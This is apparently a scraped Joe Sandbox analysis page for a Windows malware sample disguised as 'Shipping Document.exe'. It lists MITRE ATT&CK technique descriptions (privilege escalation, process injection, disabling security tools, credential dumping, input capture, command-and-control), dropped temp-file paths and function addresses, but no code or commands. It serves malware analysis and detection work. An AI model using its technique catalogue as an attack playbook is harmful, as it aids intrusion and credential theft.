Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping Document.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\33sf7m69

C:\Users\user\AppData\Local\Temp\autA2D7.tmp

C:\Users\user\AppData\Local\Temp\autA317.tmp

C:\Users\user\AppData\Local\Temp\soliloquised

C:\Users\user\AppData\Local\Temp\thixophobia

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Shipping Document.exe

Function 00FC3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00FC4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00FC4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 010293DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00FC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00FC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00FC71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00FC3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00FC3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00FC3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 01E52660 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00FC39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01E52410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre